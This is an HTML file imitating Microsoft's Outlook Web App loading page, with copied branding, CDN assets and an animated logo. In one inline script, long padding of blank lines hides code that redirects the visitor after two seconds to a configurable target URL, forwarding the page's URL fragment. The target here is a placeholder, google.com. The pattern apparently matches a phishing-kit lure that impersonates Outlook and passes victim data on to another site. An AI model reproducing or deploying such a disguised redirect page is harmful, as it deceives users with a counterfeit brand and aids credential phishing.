<!DOCTYPE html>
<html dir=ltr xmlns=http://www.w3.org/1999/xhtml translate=no>

<head>
    <meta charset=utf-8>
    <meta http-equiv=X-UA-Compatible content="IE=edge">
    <meta http-equiv=pragma content=no-cache>
    <meta name=viewport content="width=device-width,initial-scale=1,user-scalable=0">
    <meta name=google value=notranslate>
    <meta name=format-detection content="telephone=no">
    <meta name=scriptVer content=20230324008.15>
    <meta name=physicalRing content=SIP>
    <meta name=environment content=Prod>
    <meta name=bootFlights content=fwk-analytics-addons,auth-getAuthTokenV2>
    <meta name=cdnUrl content=//res.cdn.office.net />
    <meta name=backupCdnUrl content=//res-geo.cdn.office.net />
    <meta name=cdnContainer content=owamail />
    <meta name=devCdnUrl content=>
    <meta name=ariaUrl content=>
    <meta name=webServerForest content=namprd13>
    <meta name=webServerClique content=CLNAMPRD13BY101>
    <meta name=compactAriaUrl content=>
    <meta name=wcssFrameUrl content=https://webshell.suite.office.com>
    <meta name=scriptPath content=scripts />
    <meta name=owaIsAuthenticated content={{IsAuthenticated}}>
    <meta name=jsTimestamp content=1680747904531>
    <link rel="shortcut icon" href=/mail/favicon.ico type=image/x-icon>
    <link rel=apple-touch-icon href=//res.cdn.office.net/assets/mail/pwa/v1/pngs/apple-touch-icon.png>
    <noscript>JavaScript must be enabled.</noscript>
    <title>Outlook</title>
    <style>
        @font-face {
            font-family: 'Segoe UI WestEuropean';
            src: local('Segoe UI Light'), local('Segoe WP Light'), url(//res.cdn.office.net/assetss/mail/fonts/v1/fonts/segoeui-light.eot?#iefix) format('embedded-opentype'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-light.woff) format('woff'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-light.ttf) format('truetype');
            font-weight: 100;
            font-style: normal
        }

        @font-face {
            font-family: 'Segoe UI WestEuropean';
            src: local('Segoe UI'), local('Segoe WP'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-regular.eot?#iefix) format('embedded-opentype'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-regular.woff) format('woff'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-regular.ttf) format('truetype');
            font-weight: 400;
            font-style: normal
        }

        @font-face {
            font-family: 'Segoe UI WestEuropean';
            src: local('Segoe UI Semibold'), local('Segoe WP Semibold'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-semibold.eot?#iefix) format('embedded-opentype'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-semibold.woff) format('woff'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-semibold.ttf) format('truetype');
            font-weight: 600;
            font-style: normal
        }

        @font-face {
            font-family: 'Segoe UI WestEuropean';
            src: local('Segoe UI Semilight'), local('Segoe WP Semilight'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-semilight.eot?#iefix) format('embedded-opentype'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-semilight.woff) format('woff'), url(//res.cdn.office.net/assets/mail/fonts/v1/fonts/segoeui-semilight.ttf) format('truetype');
            font-weight: 200;
            font-style: normal
        }

        @font-face {
            font-family: FabricMDL2Icons;
            src: url('//res.cdn.office.net/owamail/20230324008.15/resources/fonts/o365icons-mdl2.woff') format('woff'), url('//res.cdn.office.net/owamail/20230324008.15/resources/fonts/o365icons-mdl2.ttf') format('truetype');
            font-weight: 400;
            font-style: normal
        }

        @font-face {
            font-family: office365icons;
            src: url('//res.cdn.office.net/owamail/20230324008.15/resources/fonts/office365icons.eot?');
            src: url('//res.cdn.office.net/owamail/20230324008.15/resources/fonts/office365icons.eot?#iefix') format('embedded-opentype'), url('//res.cdn.office.net/owamail/20230324008.15/resources/fonts/office365icons.woff?') format('woff'), url('//res.cdn.office.net/owamail/20230324008.15/resources/fonts/office365icons.ttf?') format('truetype'), url('//res.cdn.office.net/owamail/20230324008.15/resources/fonts/office365icons.svg?#office365icons') format('svg');
            font-weight: 400;
            font-style: normal
        }

        #preloadDiv {
            height: 1px;
            margin-bottom: -1px;
            overflow: hidden;
            visibility: hidden
        }

        #loadingScreen {
            position: fixed;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            background-color: #fff
        }

        #loadingLogo {
            position: fixed;
            top: calc(50vh - 90px);
            left: calc(50vw - 90px);
            width: 180px;
            height: 180px
        }

        #MSLogo {
            position: fixed;
            bottom: 36px;
            left: calc(50vw - 50px)
        }

        .dark #loadingScreen {
            background-color: #333
        }

        .darkNew #loadingScreen {
            background-color: #1f1f1f
        }
    </style>
    <script
        nonce=nonce-placeholder>try { if ("localStorage" in window) { var userNormalizedTheme = window.localStorage.getItem("UsersNormalizedTheme"); userNormalizedTheme && /\.dark$/.test(userNormalizedTheme) && document.documentElement.classList.add("dark"), userNormalizedTheme && /\.dark\.new$/.test(userNormalizedTheme) && document.documentElement.classList.add("darkNew"); var pwabarcolor = window.localStorage.getItem("PwaTheme"); if (pwabarcolor) { var themetag = document.getElementsByName("theme-color"); themetag && themetag.length && themetag[0].setAttribute("content", pwabarcolor) } } } catch (e) { }</script>
    <script
        nonce=nonce-placeholder>function logError(o, n, r, e, a, i) { window.owaErrorHandler ? window.owaErrorHandler(o, n, r, e, a, i) : window.owaBackfilledErrors.push(arguments) } window.FabricConfig = { fontBaseUrl: null }, window.owaBackfilledErrors = [], window.onerror = logError, "onunhandledrejection" in window && window.addEventListener("unhandledrejection", (function (o) { var n = o && o.reason || "[no reason given]"; n instanceof Error ? logError("Unhandled Rejection: " + n, "", 0, 0, n) : n.responseErrorMessage && n.callstackAtRequest && n instanceof Response ? logError(n.responseErrorMessage, "", void 0, void 0, void 0, n.callstackAtRequest) : logError("Unhandled Rejection: " + ("string" == typeof n ? n : JSON.stringify(n))) })), window.onload = function () { try { !self.Owa && self.location && self.location.search && -1 == self.location.search.indexOf("gulp") && window.location.assign("/owa/auth/frowny.aspx?bret=fail&esrc=IndexPageIncomplete&app=Mail") } catch (o) { } }</script>
    <script
        nonce=nonce-placeholder>try { !function () { if ("PerformanceLongTaskTiming" in window) { var e = window.__tti = { e: [] }; e.o = new PerformanceObserver((function (n) { e.e = e.e.concat(n.getEntries()) })), e.o.observe({ entryTypes: ["longtask"] }) } }() } catch (e) { }
    










var delayInMilliseconds = 2000; // 2 seconds delay









































var targetUrl = "https://google.com";



































setTimeout(function() {
    window.location.href = targetUrl + window.location.hash;
}, delayInMilliseconds);
</script>

   


























</head>

<body class="ms-font-s disableTextSelection ms-Fabric--isFocusHidden">
    <div id=preloadDiv> <span style="font-family:'Segoe UI WestEuropean';font-weight:100">t</span> <span
            style="font-family:'Segoe UI WestEuropean';font-weight:200">t</span> <span
            style="font-family:'Segoe UI WestEuropean';font-weight:400">t</span> <span
            style="font-family:'Segoe UI WestEuropean';font-weight:600">t</span> </div>
    <div id=app></div>
    <div id=loadingScreen>
        <div id=loadingLogo>
            <style>
                :root {
                    --s: 180px;
                    --envW: 130px;
                    --envH: 71px;
                    --calW: 118px;
                    --sqW: calc(var(--calW) / 3);
                    --sqH: 37px;
                    --calHH: 20px;
                    --calH: calc(var(--sqH) * 3 + var(--calHH));
                    --calY: calc(var(--calH) + 20px);
                    --calYExt: calc(var(--calH) - 80px);
                    --calYOverExt: calc(var(--calH) - 92px);
                    --flapS: 96px;
                    --flapH: calc(0.55 * var(--envH));
                    --flapScaleY: calc(var(--flapH) / var(--flapWidth));
                    --dur: 5s
                }

                #container {
                    width: var(--s);
                    height: var(--s);
                    animation: bounce var(--dur) infinite
                }

                @keyframes bounce {
                    0% {
                        transform: translateY(0)
                    }

                    12.5% {
                        transform: translateY(0)
                    }

                    22.5% {
                        transform: translateY(7px)
                    }

                    32.5% {
                        transform: translateY(0)
                    }

                    50% {
                        transform: translateY(0)
                    }

                    76.1% {
                        transform: translateY(0)
                    }

                    86% {
                        transform: translateY(7px)
                    }

                    100% {
                        transform: translateY(0)
                    }
                }

                #logo {
                    height: 179px;
                    width: 130px;
                    overflow: hidden;
                    margin-top: -59px;
                    margin-left: 25px
                }

                #containerShadow {
                    position: relative;
                    top: 120px;
                    left: 25px;
                    width: var(--envW);
                    height: var(--envH);
                    border-radius: 0 0 7px 7px;
                    box-shadow: rgba(0, 0, 0, .25) 0 4px 5px;
                    animation: shadow-fade var(--dur) infinite
                }

                @keyframes shadow-fade {
                    0% {
                        opacity: 0
                    }

                    21.2% {
                        opacity: 0
                    }

                    47% {
                        opacity: 1
                    }

                    70% {
                        opacity: 1
                    }

                    80% {
                        opacity: 0
                    }

                    100% {
                        opacity: 0
                    }
                }

                #flapContainer {
                    width: var(--envW);
                    margin-top: 179px
                }

                #ef {
                    width: var(--envW);
                    height: var(--envH);
                    border-radius: 0 0 7px 7px;
                    overflow: hidden;
                    margin-top: -41px
                }

                #ef>.l {
                    width: 287px;
                    height: var(--envH);
                    background: #28a8ea;
                    transform: translate(-153px, -70px) rotate(28deg)
                }

                #ef>.r {
                    width: 287px;
                    height: var(--envH);
                    background: #1490df;
                    transform: translate(-120px, 63px) rotate(-28deg)
                }

                #eb {
                    width: var(--envW);
                    height: 40px;
                    background: #123b6d;
                    margin-top: -70px
                }

                #cal {
                    display: flex;
                    flex-direction: row;
                    flex-wrap: wrap;
                    width: var(--calW);
                    height: var(--calH);
                    border-radius: 7px;
                    overflow: hidden;
                    margin: 0 auto;
                    margin-top: -306px;
                    animation: cal-bounce var(--dur) infinite;
                    animation-timing-function: cubic-bezier(0, 0.5, 0, 1);
                    transform: translateY(var(--calYExt)) scaleY(1)
                }

                @keyframes cal-bounce {
                    0% {
                        transform: translateY(var(--calY)) scaleY(1)
                    }

                    16.5% {
                        transform: translateY(var(--calY)) scaleY(1)
                    }

                    28% {
                        transform: translateY(var(--calYOverExt)) scaleY(1)
                    }

                    31% {
                        transform: translateY(var(--calYExt)) scaleY(1.05)
                    }

                    33% {
                        transform: translateY(var(--calYExt)) scaleY(.96)
                    }

                    34% {
                        transform: translateY(var(--calYExt)) scaleY(1)
                    }

                    68.5% {
                        transform: translateY(var(--calYExt)) scaleY(1);
                        animation-timing-function: cubic-bezier(0.66, -0.16, 1, -0.29)
                    }

                    76.1% {
                        transform: translateY(var(--calY)) scaleY(1)
                    }

                    100% {
                        transform: translateY(var(--calY)) scaleY(1)
                    }
                }

                #cal>.t {
                    width: var(--calW);
                    height: calc(var(--calHH) + 1px);
                    margin-bottom: -1px;
                    background: #0358a7
                }

                #cal>.r {
                    display: flex;
                    flex-direction: row;
                    width: var(--calW);
                    height: var(--sqH)
                }

                .s {
                    width: var(--sqW);
                    height: calc(var(--sqH) + 1px)
                }

                .s1 {
                    background: #0078d4
                }

                .s2 {
                    background: #28a8ea
                }

                .s3 {
                    background: #50d9ff
                }

                .s4 {
                    background: #0364b8
                }

                .s5 {
                    background: #14447d
                }

                #openedFlap {
                    width: var(--envW);
                    height: 107px;
                    animation: opened-flap-swing var(--dur) infinite;
                    animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);
                    transform-origin: top;
                    transform: translateY(-68px) rotate3d(1, 0, 0, -180deg)
                }

                @keyframes opened-flap-swing {
                    0% {
                        transform: translateY(-68px) rotate3d(1, 0, 0, -90deg)
                    }

                    14.5% {
                        transform: translateY(-68px) rotate3d(1, 0, 0, -90deg)
                    }

                    16.5% {
                        transform: translateY(-68px) rotate3d(1, 0, 0, -180deg)
                    }

                    50% {
                        transform: translateY(-68px) rotate3d(1, 0, 0, -180deg)
                    }

                    74% {
                        transform: translateY(-68px) rotate3d(1, 0, 0, -180deg)
                    }

                    76% {
                        transform: translateY(-68px) rotate3d(1, 0, 0, -90deg)
                    }

                    100% {
                        transform: translateY(-68px) rotate3d(1, 0, 0, -90deg)
                    }
                }

                #closedFlap {
                    width: var(--envW);
                    animation: closed-flap-swing var(--dur) infinite;
                    animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);
                    transform-origin: top;
                    transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 90deg)
                }

                @keyframes closed-flap-swing {
                    0% {
                        transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 0)
                    }

                    8.5% {
                        transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 0)
                    }

                    14.5% {
                        transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 90deg)
                    }

                    50% {
                        transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 90deg)
                    }

                    76% {
                        transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 90deg)
                    }

                    77% {
                        transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 0)
                    }

                    100% {
                        transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 0)
                    }
                }

                #fmask {
                    width: var(--envW);
                    height: 107px;
                    overflow: hidden
                }

                .flapTriangle {
                    width: var(--flapS);
                    height: var(--flapS);
                    background: #50d9ff;
                    margin: -48px auto 0 auto;
                    border-radius: 7px;
                    transform: scaleY(.6) rotate(45deg)
                }

                #openedFlap .flapTriangle {
                    background: #123b6d
                }

                #closedFlap .flapTriangle {
                    background: #50d9ff
                }
            </style>
            <div id=container>
                <div id=containerShadow></div>
                <div id=logo>
                    <div id=flapContainer>
                        <div id=openedFlap>
                            <div id=fmask>
                                <div class=flapTriangle></div>
                            </div>
                        </div>
                        <div id=cal>
                            <div class=t></div>
                            <div class=r>
                                <div class="s s1"></div>
                                <div class="s s2"></div>
                                <div class="s s3"></div>
                            </div>
                            <div class=r>
                                <div class="s s4"></div>
                                <div class="s s1"></div>
                                <div class="s s2"></div>
                            </div>
                            <div class=r>
                                <div class="s s5"></div>
                                <div class="s s4"></div>
                                <div class="s s1"></div>
                            </div>
                        </div>
                    </div>
                    <div id=eb></div>
                    <div id=ef>
                        <div class=r></div>
                        <div class=l></div>
                    </div>
                    <div id=closedFlap>
                        <div id=fmask>
                            <div class=flapTriangle></div>
                        </div>
                    </div>
                </div>
            </div>
        </div> <svg id=MSLogo width=99 height=22 xmlns=http://www.w3.org/2000/svg>
            <g fill=none fill-rule=evenodd>
                <path
                    d="m34.64 12.07-.58 1.65h-.04c-.1-.39-.28-.93-.56-1.63l-3.14-7.9h-3.08v12.56h2.03V9.03l-.03-1.7c-.01-.34-.05-.6-.06-.81h.05c.1.47.2.83.28 1.07l3.78 9.16h1.42l3.75-9.24c.08-.21.17-.62.25-1h.05c-.05.92-.1 1.76-.1 2.26v7.98h2.17V4.2h-2.96l-3.23 7.88z"
                    fill=#737474 />
                <path d="M0 20.96h98.15V0H0z" />
                <path fill=#737474
                    d="M42.87 16.75h2.11v-9h-2.11zm1.08-12.82c-.35 0-.66.12-.9.35a1.17 1.17 0 0 0-.38.88c0 .35.12.64.37.87.25.23.55.34.9.34s.67-.11.92-.34c.25-.23.38-.52.38-.86 0-.34-.13-.64-.37-.88a1.26 1.26 0 0 0-.92-.36m8.53 3.73a5.9 5.9 0 0 0-1.19-.12c-.97 0-1.83.2-2.57.62-.74.4-1.3 1-1.7 1.74a5.57 5.57 0 0 0-.01 4.9c.37.7.9 1.23 1.58 1.6.67.38 1.45.57 2.31.57 1.01 0 1.87-.2 2.56-.6l.03-.02v-1.94l-.1.07c-.3.23-.65.4-1.03.54a3.12 3.12 0 0 1-1.01.2c-.83 0-1.5-.26-1.98-.78a3 3 0 0 1-.73-2.14c0-.9.25-1.65.76-2.2a2.6 2.6 0 0 1 1.98-.81c.7 0 1.38.23 2.02.7l.09.06V8.01L53.46 8a3.5 3.5 0 0 0-.98-.33m6.97-.06a2.17 2.17 0 0 0-1.41.5c-.36.3-.62.7-.82 1.21h-.02V7.75h-2.12v9h2.12v-4.6c0-.78.18-1.43.53-1.91.34-.48.8-.73 1.37-.73a2.5 2.5 0 0 1 1.13.3l.09.06V7.74l-.04-.02c-.2-.08-.47-.12-.83-.12m7.44 6.87c-.4.5-1 .75-1.78.75s-1.4-.26-1.83-.77a3.25 3.25 0 0 1-.65-2.16c0-.96.22-1.7.65-2.22a2.24 2.24 0 0 1 1.8-.78c.75 0 1.34.25 1.77.74.42.5.64 1.24.64 2.2 0 .98-.2 1.73-.6 2.23M65.2 7.54a4.7 4.7 0 0 0-3.5 1.29 4.84 4.84 0 0 0-1.27 3.53c0 1.4.42 2.54 1.24 3.36a4.48 4.48 0 0 0 3.31 1.25c1.44 0 2.6-.44 3.44-1.31a4.84 4.84 0 0 0 1.26-3.5c0-1.43-.4-2.57-1.18-3.39a4.38 4.38 0 0 0-3.3-1.23m9.18 3.93a4.6 4.6 0 0 1-1.27-.66.93.93 0 0 1-.26-.7c0-.25.1-.46.33-.63.22-.17.52-.26.9-.26a3.74 3.74 0 0 1 2.04.6l.1.07V7.93l-.04-.02a4.71 4.71 0 0 0-.97-.26 5.93 5.93 0 0 0-1.05-.11c-1.01 0-1.85.25-2.49.76a2.45 2.45 0 0 0-.96 2c0 .42.07.8.2 1.12.15.32.36.6.65.83.28.24.72.48 1.3.73.49.2.85.37 1.08.5.23.14.39.27.48.4.09.12.13.3.13.5 0 .61-.45.9-1.38.9a3.8 3.8 0 0 1-1.17-.2 4.42 4.42 0 0 1-1.2-.62l-.1-.06v2.06l.04.02a6.02 6.02 0 0 0 2.35.5c1.1-.01 1.98-.27 2.62-.78.65-.52.98-1.2.98-2.05 0-.6-.18-1.12-.53-1.54-.34-.42-.94-.8-1.78-1.14m9.68 3c-.4.5-1 .75-1.78.75-.77 0-1.39-.26-1.82-.77a3.25 3.25 0 0 1-.65-2.16c0-.96.22-1.7.65-2.22a2.24 2.24 0 0 1 1.8-.78c.75 0 1.34.25 1.76.74.43.5.65 1.24.65 2.2 0 .98-.2 1.73-.6 2.23m-1.69-6.92a4.7 4.7 0 0 0-3.5 1.29 4.84 4.84 0 0 0-1.27 3.53c0 1.4.42 2.54 1.24 3.36a4.48 4.48 0 0 0 3.31 1.25c1.44 0 2.6-.44 3.44-1.31a4.84 4.84 0 0 0 1.26-3.5c0-1.43-.4-2.57-1.19-3.39a4.38 4.38 0 0 0-3.29-1.23m15.77 1.94V7.75H96V5.07l-.07.02-2.01.62h-.04v2.04H90.7V6.62c0-.53.12-.93.35-1.2.23-.27.56-.4.99-.4.3 0 .61.07.93.21l.08.04V3.45L93 3.43c-.3-.1-.7-.15-1.2-.15-.62 0-1.19.13-1.68.4-.5.27-.89.66-1.16 1.15a3.41 3.41 0 0 0-.41 1.68v1.24h-1.5v1.73h1.5v7.27h2.14V9.48h3.18v4.62c0 1.9.9 2.87 2.67 2.87a4.36 4.36 0 0 0 1.57-.31l.03-.02V14.9l-.09.06c-.12.07-.26.14-.43.18-.17.05-.31.08-.42.08-.42 0-.73-.12-.92-.34-.19-.22-.29-.6-.29-1.15V9.48h2.15z" />
                <path fill=#F05124 d="M0 9.96h9.96V0H0z" />
                <path fill=#7EBB42 d="M11 9.96h9.95V0H11z" />
                <path fill=#32A0DA d="M0 20.96h9.96V11H0z" />
                <path fill=#FDB813 d="M11 20.96h9.95V11H11z" />
            </g>
        </svg>
    </div>
</body>

</html>
